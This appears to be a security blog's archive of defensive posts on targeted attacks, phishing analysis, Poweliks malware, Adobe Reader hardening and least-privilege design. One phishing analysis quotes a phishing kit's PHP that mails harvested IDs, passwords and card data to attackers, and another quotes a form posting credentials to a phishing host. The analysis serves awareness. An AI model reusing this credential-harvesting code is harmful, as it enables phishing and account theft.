Tag Archives: Targeted Attacks

The technology dimension of social engineering

7 February 2015

In his post ‘Weird Security Term of the Week: “Social Engineering”’ Kurt Ellzey talks of ‘Social Engineering’ as the ‘Art of Getting Information’ about a person.

A short query on Google reveals a multitude of information that could be used to create a rough profile of a person. A malicious insider could easily enhance this profile by personal information gathered from e.g. a company intranet or SharePoint MySites.

Besides this ‘personal information’ a rich set of easy to extract ‘technical information’ about an employee is available from a company network.

A Windows workstation is a universal machine. It can be used to run an application as well as to administer a server or network. For example, the built-in ‘net’ command could be used to retrieve detailed employee account data from the Active Directory.

Some colors to fight the winter depression.

Some colors to fight the winter depression.
50°53’28.3″N 4°21’31.9″E

IAM (Identity and Access Management) systems, very often deployed as self-services to improve user satisfaction, could be used to get detailed information about the applications used by employees to get their job done.

But the worst is that this information sources are available for all employees, irrespective of whether they are needed in the job. This is a massive violation of the Principle of Least Privilege.

Attackers can read in company networks like in an open book.

And, when enriched with technical information, a personal profile becomes an invaluable information source for targeted attacks.

Just some suggestions on how to tackle these problems.

As general design principle I would strongly recommend to enforce the principle of least privilege for all information systems. Software restriction policies could be used to reject standard user access to administrative commands. IAM systems should offer only user related information on a user’s request.

I dream of an operating system which provides only those commands and applications which are essential for a user’s job. This could reduce the attack surface of a company dramatically.

Have a nice weekend!

Software manufacturers have no sense for IT security – Part II

23 October 2014

Sometimes malware protection software works too well. I found some emails with malicious executables, disguised as pdf files, in the attachment in my junk-mail folder. Unfortunately the anti-malware system removed the attachments and replaced them by the filename.

Some weeks ago a new kind of malware that resides solely in the registry was in the news. To implant Poweliks attackers must exploit a vulnerability of the system and, the good faith of the users. Pdf or rtf documents with embedded malicious code are used very often to start the attack.

Just why is the Adobe Reader such a popular tool for attackers?

Adobe Reader is very popular for viewing of pdf documents, and very notorious for its vulnerabilities. The list of known vulnerabilities published in the National Vulnerability Database is really long, and some of them are perfectly suited to implant malware. By the way, Adobe Flash Player is as popular as the Adobe Reader for attackers, and the list of vulnerabilities is of comparable size.

Fortunately advanced security options like a sandbox are available to defend malicious attacks, but these are not activated during a standard installation. Even for enterprise users the standard installation procedure must be pre-configured.

I can’t find a reason why Adobe does not install the Reader with advanced security options enabled by default. Apparently, Adobe is not interested in protecting the privacy and security of their customers.

Fortunately the National Checklist Program Repository provides ‘detailed low level guidance on setting the security configuration of operating systems and applications’.

For Acrobat Reader X a checklist is available which could be easily adapted to the Acrobat Reader XI. Although this checklist is meant for pre-configuring installation packages the configuration hints could be used to secure existing installations as well:

Navigate to menu Edit/Preferences.

In category General section Application Startup activate option Use only certified plug-ins.

In category Security (Enhanced) set the protection options as described below:

Adobe ReaderEnhanced Security Settings

Adobe ReaderEnhanced Security Settings

[1] Enable sandboxing for all files

[2] Enable Enhanced Security

[3] Disable all Privileged Locations.

Although this sounds somewhat paranoid viewing of pdf files is much more secure now. A pdf file is now opened in a sandbox running at the lowest integrity level. Most features are disabled by default, but could be enabled with just one click.


Inside a phishing attack

25 September 2014

I was phished again some days ago. This time I received a well made phishing mail with a request for verifying my Apple account details:

Phishing Mail Browser View

Phishing Mail Browser View

This was a targeted attack because the email was directly sent to my Hotmail account. When viewed on the iPad the email looks like an official email from Apple.

But viewed in Outlook the senders address

Apple . <apple__itunes@outlook.com>

made it clear: This was a phishing attack. Apple would never send such a mail from an outlook.com account.

Fortunately, the attackers provided a copy of the phishing scripts for download from their web service. This offered me the wonderful opportunity to analyze a phishing attempt in detail.

All links in the email point to the same internet address, a server in France, that was compromised by the attackers to cover their tracks. They installed a small script ‘apple.php’ which was used for forwarding to the malicious site. The malicious site is hosted by a provider in Vancouver, Canada.

Phishing Site Login Form

Phishing Site Login Form

This is a really well crafted site in Apple style. But two errors in the address line

[1] http://[2]app-secure-restore.lideresrd.com/APP/ACCOU/RESET/

immediately catch the eye:

[1] Apple would never use the unsecure http protocol for access to site where users have to input their credentials. Standard for those applications is the https protocol.

In my opinion the protocol is the best indicator for identifying a phishing attempt.

As a rule of thumb, the usage of protocol http for user authentication means: You are under attack!

[2] Apple would never use a web service outside the Apple company web for user data verification.

Since we have identified this site as a malicious site, we enter some rubbish and press Continue for the next page. When pressing Continue the html command

<form method="post" action="RESTORE/">

is executed and sub page RESTORE at
http://app-secure-restore.lideresrd.com/APP/ACCOU/RESET/RESTORE/&#8217; is displayed:

Account Verifiacation Details

Account Verifiacation Details

Page RESTORE is created at runtime by a php script. If you press Verify my Information the script is executed again. This time it emails [1]  the data you entered to the attackers and runs script finish.php [2] that forwards you to the Apple store.

 $from_name  = '&iacute;Τunes';
 $from_email  = 'localhost';
 $to_email  = '<Attackers email addresses>';
 $subject  = 'New UK &iacute;Τunes  | '.$_POST['A13'].' ';
[2] $url_redirect = 'finish.php';
 if(isset($_POST) AND !empty($_POST) AND isset($_POST['A9'])){
   $mail = new mail();
   $mail->emailto  = $to_email;
   $mail->namefrom  = $from_name;
   $mail->emailfrom = $from_email;
   $mail->subject  = $subject;
   $mail->message  = '';   
   $mail->message  .= 'CoT : '.$_POST['A5'].'
'; // payys
   $mail->message  .= 'I : '.$_POST['donnee1'].'
'; //Id
   $mail->message  .= 'P : '.$_POST['donnee2'].'
'; //Pass
  .... more code
   $mail->message  .= 'DRL  : '.$_POST['A13'].'
'; // Sortt
   $mail->message  .= 'CP : '.$_POST['A14'].'
'; // Carpas
   $mail->check  = $_POST['is_valid_email'];
[1]   $mail->send();

That was a really long journey from Germany via France and Canada to Cupertino.

Take care!

I am phished!

11 September 2014

During my vacation I got some well made phishing mails. Since an iPad is not the best device for analyzing phishing mails I filed them for further processing at home.

Hotmail Phishing Mail

Hotmail Phishing Mail

It is obvious that this is a phishing email:

  1. The Hotmail Team would never use an email address like someone@fastmail.fm to communicate with customers.
  2. The support team would never notify 113 recipients with a single mail due to privacy reasons.

Normally I drop such mails immediately but sometimes I do some further analysis to keep awareness high.

Thus I clicked the URL and got a very puzzling dialog box in Internet Explorer:

Verify Your Account Dialog

Verify Your Account Dialog

This dialog tells us that phishing will start soon! By now, it should be clear that something is wrong because Outlook will never display a message like this.

Finally, a faked Outlook login page is displayed:

Outlook Login Phishing Site

Outlook Login Phishing Site

Again, it is obvious that this is really well made fake:

  1. The site address is not Outlook.com.
  2. Site access is not secured. The http protocol is used instead of the https protocol.
  3. A Validate button is displayed instead of a Sign in button.

It is this Validate button that sends your login credentials to the phishing site:

form name=”f1″ action=”http://johnbomb.altervista.org/fi.php&#8221; method=”POST” novalidate …

For more details activate menu ‘Developer Tools’ or hit ‘F12’ and use the Inspect function from the context menu.

What do we learn from this?

Phishing mails and sites are easy to recognize. Just be aware of the danger!

Review – US nuclear regulator hacked several times over three years

24 August 2014

In post US nuclear regulator hacked several times over three years. from 19 August 2014 Warwick Ashford talks about attacks on the U.S. Nuclear Regulatory Commission (NRC).

The big question is: What makes the NRC so interesting for attackers? Reports of safety audits containing information that should not be made public? I really doubt it.

In Exclusive: Nuke Regulator Hacked by Suspected Foreign Powers you get an idea about the real reasons:

‘Federal systems are constantly probed by hackers, but those intrusions are not always successful.’

Thank goodness this is absolutely correct! In nuclear power plants very old IT technology is used that can not be attacked easily. But the detailed description of vulnerabilities found in audit reports will make successful attacks more likely.

Perhaps you remember the film ‘War Games’? Although the Maximum Credible Accident in a nuclear power plant is not comparable to a nuclear world war, the impact on health and environment is catastrophic. Therefore such events must be taken extremely serious.

By the way, the statement above talks about the known attacks on federal systems. The total number of successful attacks may be much higher …

Don’t Panic!

Review – ‘Poweliks’ malware variant employs new antivirus evasion techniques

9 August 2014

On 4 August 2014 Brandan Blevins talks in his post ‘‘Poweliks’ malware variant employs new antivirus evasion techniques‘ about a new malware which uses new infection routes.

My first thought was: Oh no, not another new malware that could not be detected by state-of-the-art Anti Virus systems!

My second thought was: Hold on for a moment. The Poweliks malware appears to jump into our computers like a deus ex machina! Sounds like magic, doesn’t it?

If you dig somewhat deeper, you find, that to implant the malware, attackers must exploit a vulnerability of the system and, the good faith of the users. In this case the media was a Word attachment of an email and a flaw in the MSCOMCTL.OCX described in CVE-2012-0158.

In section ‘What might an attacker use the vulnerability to do?’ Microsoft describes the impact:

Bacteriophage P2. Source: Mostafa Fatehi

Bacteriophage P2. Source: Mostafa Fatehi

‘An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights…’.

And this is exactly what the Poweliks malware does.

What countermeasures could we take?

(a) Do not open attachment and files from untrusted sources like email. Common sense can prevent lots of malware attacks.

(b) Do not work with permanent administrative rights.

(c) Change the User Account Control (UAC) Settings to the highest level ‘Always notify’. The malware installs Powershell, if not already installed. In this case UAC will notify you.

(d) Check whether the latest updates and patches are installed. CVE-2012-0158 was fixed in 2012 and can not be used for an attack, if Windows Update is configured to automatically install updates.

(e) Review the Trust Center Settings in Microsoft Office.

Activate ‘ Disable all macros with notification’ in section ‘Macro Settings’,

Activate ‘Prompt me before enabling all controls with minimal restrictions’ in section ‘ActiveX Settings’.

Activate ‘File Block Settings’ except for Office 2007 or later formats in section ‘File Block Settings’.

(f) Check your AV providers Homepage for the latest updates or utilities. I bet you will find some Information or tool which could support you in an emergency.

(g) Don’t Panic!

Have a good Weekend

SearchSecurity – On prevention vs. detection, Gartner says to rebalance purchasing

28 June 2014

On prevention vs. detection, Gartner says to rebalance purchasing.

In this post Eric B. Parizo, Executive Editor for TechTarget’s Security Media Group, makes clear that the effectiveness of traditional, signature-based protective technologies like intrusion detection and prevention or antimalware will significantly decrease in future.

Gartner’s Adaptive Security Architecture (ASA) is a new approach for defense against targeted attacks. ASA is a re-active defense strategy based on continuous monitoring and analytics, and should be complemented by traditional, signature based pro-active technologies.

Ths ASA approach has one small(?) weakness: In the time between an attack, its first recognition and the implementation of protection measures we are left defenseless! This time shut be kept as small as possible to prevent greater damage.

In my opinion, there is a third, recommendable way: Micro-Virtualization

Micro-Virtualization is a new approach for defense against, not only targeted, attacks that irons out the weaknesses of the ASA approach. An e-mail client or an internet browser session is completely isolated from other tasks and the operating system. Only those data required for successful execution of the task (Need-to-Know principle) are loaded into the isolation container.

In the case of an attack only the data inside the isolation container is affected and on session end the malicious code is destroyed with the isolation container. This feature makes Micro-Virtualization a perfect complement for ASA and the traditional signature-based approach.

For more details about Micro-Virtualization please see www.bromium.com.